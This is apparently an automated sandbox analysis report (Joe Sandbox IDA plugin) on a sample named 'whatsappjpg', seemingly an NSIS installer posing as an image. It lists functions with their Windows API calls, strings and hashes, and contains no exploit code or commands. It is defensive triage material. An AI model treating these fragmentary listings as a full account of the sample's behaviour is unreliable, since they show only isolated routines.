Opcode ID: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
Instruction ID: 37036d35f8974e55ed68100cf34a45723990335e8d7a2adc0945050858e8c70a
Opcode Fuzzy Hash: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
Instruction Fuzzy Hash: 7D41CB725042019FDB10DF29ED848A63BACFB54356720827FE910B22E1D7B99D41DBED

Function 0040617C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403330,00436800,76F93420,00403510), ref: 004061DF
CharNextW.USER32(?,?,?,00000000), ref: 004061EE
CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403330,00436800,76F93420,00403510), ref: 004061F3
CharPrevW.USER32(?,?,00436800,00436800,00000000,00403330,00436800,76F93420,00403510), ref: 00406206

Strings

*?|<>/":, xrefs: 004061CE

Memory Dump Source

Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
Instruction ID: 7432597920acc0cf63456e540fa2db4f3ec2516b3ebf296f4b2d54ebc9aa4c6f
Opcode Fuzzy Hash: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
Instruction Fuzzy Hash: B711B67580021295EB303B548C40BB762F8AF54760F56803FE996772C2EB7C5C9286BD

Function 004024EC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54filestringCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,0040A580,000000FF,00409D80,00000400,?,?,00000021), ref: 0040252D
lstrlenA.KERNEL32(00409D80,?,?,0040A580,000000FF,00409D80,00000400,?,?,00000021), ref: 00402534
WriteFile.KERNEL32(00000000,?,00409D80,00000000,?,?,00000000,00000011), ref: 00402566

Strings

8, xrefs: 0040250A

Memory Dump Source

Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd

Similarity

API ID: ByteCharFileMultiWideWritelstrlen
String ID: 8
API String ID: 1453599865-4194326291
Opcode ID: eb4f0eac3f684fb2a63f37bc1092f8bc6a44a302634324d4ca23fee1544f7428
Instruction ID: 3c80ca3e5ebaf71c7783d8616bec5f928a83f38c30d871a0748769bbcf272298
Opcode Fuzzy Hash: eb4f0eac3f684fb2a63f37bc1092f8bc6a44a302634324d4ca23fee1544f7428
Instruction Fuzzy Hash: 8B019271A44204BED700AFA0DE89EAF7278EB50319F20053BF502B61D2D7BC5E41DA2E

Function 00401752 Relevance: 7.6, APIs: 5, Instructions: 145stringtimeCOMMON

Download Yara Rule

APIs

lstrcatW.KERNEL32(00000000,00000000,00409580,00435000,?,?,00000031), ref: 00401793
CompareFileTime.KERNEL32(-00000014,?,00409580,00409580,00000000,00000000,00409580,00435000,?,?,00000031), ref: 004017B8

Part of subcall function 00405EE8: lstrcpynW.KERNEL32(?,?,00000400,004033C6,004281E0,NSIS Error), ref: 00405EF5

Part of subcall function 00405192: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
Part of subcall function 00405192: lstrcatW.KERNEL32(004216B0,00402D92,00402D92,004216B0,00000000,00000000,00000000), ref: 004051ED
Part of subcall function 00405192: SetWindowTextW.USER32(004216B0,004216B0), ref: 004051FF
Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D

Memory Dump Source

Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID:
API String ID: 1941528284-0
Opcode ID: f85250a5a9e88103d3d651ef37910dcedbb4e657076cd08a1369e1982fdbe284
Instruction ID: 10c9bfb48ac22d70b7a6fd4bf6847715cc6e5200bae8767ad0241ecc3b8f07ee
Opcode Fuzzy Hash: f85250a5a9e88103d3d651ef37910dcedbb4e657076cd08a1369e1982fdbe284
Instruction Fuzzy Hash: 6841B172904519BACF10BBB5CC86DAF7679EF05329F20463BF521B11E1D63C8A41CA6E

Function 00402B78 Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B99
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD5
RegCloseKey.ADVAPI32(?), ref: 00402BDE
RegCloseKey.ADVAPI32(?), ref: 00402C03
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C21

Memory Dump Source

Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
Instruction ID: 9ec10266fc8442ca9feb2f2c36393197ef7fd7660a084b6a818e704b420db749
Opcode Fuzzy Hash: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
Instruction Fuzzy Hash: 0D113A7190410CFEEF11AF90DE89EAE3B79EB44348F10057AFA05A10E0D3B59E51AA69

Function 00401CE5 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401CEB
GetClientRect.USER32(00000000,?), ref: 00401CF8
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
DeleteObject.GDI32(00000000), ref: 00401D36

Memory Dump Source

Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: ebee129f8a245dc929862c077a7183d7f7680bcc51d1a04b4969c9551adf2949
Instruction ID: d276e06630420d280db9d3d8713a95f95ab602fc4af0e03377fdcd968a8fda9f
Opcode Fuzzy Hash: ebee129f8a245dc929862c077a7183d7f7680bcc51d1a04b4969c9551adf2949
Instruction Fuzzy Hash: B9F0ECB2A04104AFD701DFE4EE88CEEB7BCEB08301B100466F601F61A0D674AD018B39

Function 00401D41 Relevance: 7.5, APIs: 5, Instructions: 38COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D44
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
ReleaseDC.USER32(?,00000000), ref: 00401D71
CreateFontIndirectW.GDI32(0040BD88), ref: 00401DBC

Memory Dump Source

Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: 5126b5a6483c23ca9b923fe170de86e7b0dfb2dc664948fdd2ce29f1bdd8c223
Instruction ID: 44c615356a1505882b51123a4f434c8e94683597a24d5f064f7d9f3cb87cb74c
Opcode Fuzzy Hash: 5126b5a6483c23ca9b923fe170de86e7b0dfb2dc664948fdd2ce29f1bdd8c223
Instruction Fuzzy Hash: 25012630948280AFE7006BB0AE4BB9A7F74EF95305F104479F145B62E2C37810009B6E

Function 00403060 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300C,000000FF,00000000,00000000,00409230,?), ref: 00403086
WriteFile.KERNEL32(00000000,00413E78,?,000000FF,00000000,00413E78,00004000,00409230,00409230,00000004,00000004,00000000,00000000,?,?), ref: 00403113

Strings

x>A, xrefs: 004030DC

Memory Dump Source

Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd

Similarity

API ID: File$PointerWrite
String ID: x>A
API String ID: 539440098-3854404225
Opcode ID: b27c88111c9479bfc016d655c0b2bfb1ccfb1f1bf46317cd24110ceb5cc412c0
Instruction ID: fc2ead670903f3fcf09a518996cfd184d9dc321171b4a7c5d6e0cc79c3f8c1f9
Opcode Fuzzy Hash: b27c88111c9479bfc016d655c0b2bfb1ccfb1f1bf46317cd24110ceb5cc412c0
Instruction Fuzzy Hash: 8C312631504219FBDF11CF65EC44A9E3FBCEB08755F20813AF904AA1A0D3749E51DBA9

Function 00404976 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(004226D0,004226D0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A07
wsprintfW.USER32 ref: 00404A10
SetDlgItemTextW.USER32(?,004226D0), ref: 00404A23

Strings

%u.%u%s%s, xrefs: 004049F1

Memory Dump Source

Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: a87d65089fa2b22b88f3ea6921d71f9a407986b65cfb91be1df2eb5324c2a4fc
Instruction ID: 11a56ec29d8e774b63c5a31ca8dd146b3e369a93441477fc7d09fda37b012288
Opcode Fuzzy Hash: a87d65089fa2b22b88f3ea6921d71f9a407986b65cfb91be1df2eb5324c2a4fc
Instruction Fuzzy Hash: 7011E273A002243BCB10A66D9C45EAF368D9BC6374F14423BFA69F61D1D9799C2186EC

Function 00401BCA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42

Strings

!, xrefs: 00401BFE

Memory Dump Source

Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 9d438e6b5940c4dfeb703fc487ee7d8779a96f3a357671301b43fd1e281e0956
Instruction ID: 4e2ee5f0d92934ddef816e72561913b102c535ce611946f90f9b6b3ff638ae8b
Opcode Fuzzy Hash: 9d438e6b5940c4dfeb703fc487ee7d8779a96f3a357671301b43fd1e281e0956
Instruction Fuzzy Hash: 2221A171A44208AEEF01AFB0C98AEAD7B75EF45308F10413AF602B61D1D6B8A941DB19

Function 0040232F Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236D
lstrlenW.KERNEL32(0040A580,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238D
RegSetValueExW.ADVAPI32(?,?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C9
RegCloseKey.ADVAPI32(?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA

Memory Dump Source

Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID:
API String ID: 1356686001-0
Opcode ID: d61713cf9ddd3f610e149d83436bff4682ee40a9bf76952b8ac674dc90b080fe
Instruction ID: 4c75d48ff27920bf3256dab6d3d18bc6d0e5d26c1911ded3a9e9fdbcc9a4e390
Opcode Fuzzy Hash: d61713cf9ddd3f610e149d83436bff4682ee40a9bf76952b8ac674dc90b080fe
Instruction Fuzzy Hash: 89118EB1A00108BEEB10AFA4DE4AEAF777CEB54358F10043AF504B61D0D7B86E419B69

Function 004015B9 Relevance: 6.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

Part of subcall function 004059DE: CharNextW.USER32(?,?,00424ED8,?,00405A52,00424ED8,00424ED8,00436800,?,76F92EE0,00405790,?,00436800,76F92EE0,00434000), ref: 004059EC
Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 004059F1
Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 00405A09

CreateDirectoryW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
GetFileAttributesW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
SetCurrentDirectoryW.KERNEL32(?,00435000,?,00000000,000000F0), ref: 00401630

Memory Dump Source

Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
String ID:
API String ID: 3751793516-0
Opcode ID: 0bff73914de4e6eed910c0ec0e64b32a9aea0308159657b3b0e440d9c8159a1f
Instruction ID: 199c01fa1d361ac50fd0ab4436582695df459e1bfde9dc24052da25e00d2fbae
Opcode Fuzzy Hash: 0bff73914de4e6eed910c0ec0e64b32a9aea0308159657b3b0e440d9c8159a1f
Instruction Fuzzy Hash: D011C271908104EBDB206FA0CD449AF36B0EF15365B64063BF881B62E1D63D49819A6E

Function 00401F08 Relevance: 6.1, APIs: 4, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69

Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C

Memory Dump Source

Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd

Similarity

API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
String ID:
API String ID: 1404258612-0
Opcode ID: ca7f9e254c0363c1f49dfe126ad383ac947da7ba503cf0d7429683875ede6684
Instruction ID: 69d4cfede9788cc5a39dfd4732502e81c1ba8e36930914c0ac138746a00c9a3b
Opcode Fuzzy Hash: ca7f9e254c0363c1f49dfe126ad383ac947da7ba503cf0d7429683875ede6684
Instruction Fuzzy Hash: 27114875A00108BEDB00EFA5D945DAEBBBAEF04344F21407AF501F62E1E7349E50CB68

Function 00401E51 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00405192: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
Part of subcall function 00405192: lstrcatW.KERNEL32(004216B0,00402D92,00402D92,004216B0,00000000,00000000,00000000), ref: 004051ED
Part of subcall function 00405192: SetWindowTextW.USER32(004216B0,004216B0), ref: 004051FF
Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D

Part of subcall function 00405663: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 00405688
Part of subcall function 00405663: CloseHandle.KERNEL32(?), ref: 00405695

WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9

Memory Dump Source

Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd

Similarity

API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
String ID:
API String ID: 3585118688-0
Opcode ID: e2e2f1a1846438e0669df5bc00fb77d2eadfb6d246281b8a1ec737ff05b26262
Instruction ID: 8e91623f4638d025a4933f87a40467008e120c5c7d6e9a438bfd220985abd326
Opcode Fuzzy Hash: e2e2f1a1846438e0669df5bc00fb77d2eadfb6d246281b8a1ec737ff05b26262
Instruction Fuzzy Hash: 5D11A131D00204EBCF109FA1CD859DE7AB5EB04315F60443BF905B62E0C7794A92DF9A

Function 00405106 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00405135
CallWindowProcW.USER32(?,?,?,?), ref: 00405186

Part of subcall function 00404179: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418B

Strings

, xrefs: 00405116

Memory Dump Source

Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
Instruction ID: a693931b294d40b9fc88652aed0c21abafbc2ac9e0ef9b0e0ec3bcc5ba2f922e
Opcode Fuzzy Hash: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
Instruction Fuzzy Hash: B2019E71A00609FFDB215F51DD84F6B3726EB84350F508136FA007A2E1C37A8C929F6A

Function 00405B83 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00405BA1
GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,00403356,00436000,00436800), ref: 00405BBC

Strings

nsa, xrefs: 00405B90

Memory Dump Source

Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
Instruction ID: b92cbf5d1f1efc9604712da85ceffb4fcd72973976825a501547a71b9f4f898e
Opcode Fuzzy Hash: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
Instruction Fuzzy Hash: 14F09676600204BFDB008F55DC05A9B77B8EB91710F10803AE900F7181E2B0BD40CB64

Function 00405663 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 00405688
CloseHandle.KERNEL32(?), ref: 00405695

Strings

Error launching installer, xrefs: 00405676

Memory Dump Source

Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
Instruction ID: 4b20dbd08d60de92207ac43a38ffec0a38bd3943f5c764e36e0fdac2018f49d3
Opcode Fuzzy Hash: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
Instruction Fuzzy Hash: 2DE0ECB4A01209AFEB00DF64ED4996B7BBDEB00744B908921A914F2250E775E8108A79

Function 00406972 Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25c19981d6431e8b6504c86e3d36571f05d32f9c4d6ef30975c92d2472a0c349
Instruction ID: 94fbdcceb26da600dda965ba42e87acb8ed5f49c48e72c46c8f329f18f478b7c
Opcode Fuzzy Hash: 25c19981d6431e8b6504c86e3d36571f05d32f9c4d6ef30975c92d2472a0c349
Instruction Fuzzy Hash: 31A13271E00229CBDF28CFA8C8446ADBBB1FF48305F15856AD856BB281C7785A96DF44

Function 00406B73 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

